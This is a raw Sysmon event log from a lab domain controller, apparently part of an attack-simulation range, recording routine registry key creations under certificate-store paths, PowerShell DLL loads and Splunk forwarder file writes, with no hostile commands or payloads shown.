12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.045{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.023{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.023{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057347357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057347345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.857{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OpcServices.dll10.0.14393.2848 (rs1_release.190305-1856)Native Code OPC Services LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationOpcServices.dllMD5=991F8CCB43104DE3BD6E24A4D2BF870D,SHA256=8187C096A269D20742DEC9B651536F1C7A354D114B176179B1F4E090BB28E1F2trueMicrosoft WindowsValid 12241200x800000000000000057347344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.022{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.021{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.021{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.021{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.021{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.021{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.021{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.019{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057348130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.575{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.575{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F05FBDC573E5F689EEF7D6AF27F2F38F,SHA256=FB81B25400FF7AF49BF184C00027567BD1D4BC07B87934FFBEBAAA24D4CB2EF0falsetrue 11241100x800000000000000057348128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.506{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.506{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BD6E3796071BD752680B493C5432D9B7,SHA256=DF2BF32FC52448FFCF6D500B6B7FC49B109F4615E517AE6C22017C334BABC793falsetrue 11241100x800000000000000057348126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.359{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.359{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9FE555C90F02464A74EF5E16D72D11C0,SHA256=DD929B8DF3652A1AA377D2DAAC1B9326B23738892C1B52902FCCA1F71D6C180Afalsetrue 11241100x800000000000000057348124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.322{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057348123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.322{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F70435B85418C2454470CAB689C565B0,SHA256=D21FBB53EB8E407C7340FE0BC5B47AACCFE4E98DC85C9F7118B59095D77DFFA1falsetrue 534500x800000000000000057348122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.290{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x800000000000000057348121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.290{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive2021-09-16 13:08:16.573 23542300x800000000000000057348120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.290{8B6011A9-5BA4-618E-53F3-04000000F101}4192ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CFfalsetrue 11241100x800000000000000057348119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.206{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.206{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68980FFB01E9179A026CD470C8A0AD53,SHA256=BCF6AEF31C81479D13ED9BAD080CD1FDFC64D781B3F2C97A051348C380C58EE1falsetrue 734700x800000000000000057348117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.159{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057348116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.159{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll10.0.14393.2969Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Commands.Management.dllMD5=3A1B9D9F3D978CCBB25CE1A34A25AEF2,SHA256=67DC001FA5497A40FB991F39E8CD8DE2C061DC31A1532279D1C5C6F335D580D1false-Unavailable 12241200x800000000000000057348115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:45.144{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057348091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.144{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.143{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E99220B1BAEF0201916DB1372FCA901,SHA256=4207D1388AC3565E8ED1AEE7BB5D838175B1776FA5C3D4D592017526CF5C8B37falsetrue 11241100x800000000000000057348089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.139{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.139{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=92E11DDBDEF07F9F26FF9EAC4B5D07AF,SHA256=03AFDC6ADC78D199574C6C5878D07FE83830CC949858B6439B4D8AE5FAB1F29Ffalsetrue 11241100x800000000000000057348087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.122{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\pstransactions\20211112\PowerShell_transcript.WIN-DC-469.dEC+c+9f.20211112121845.txt2021-11-12 12:18:45.122 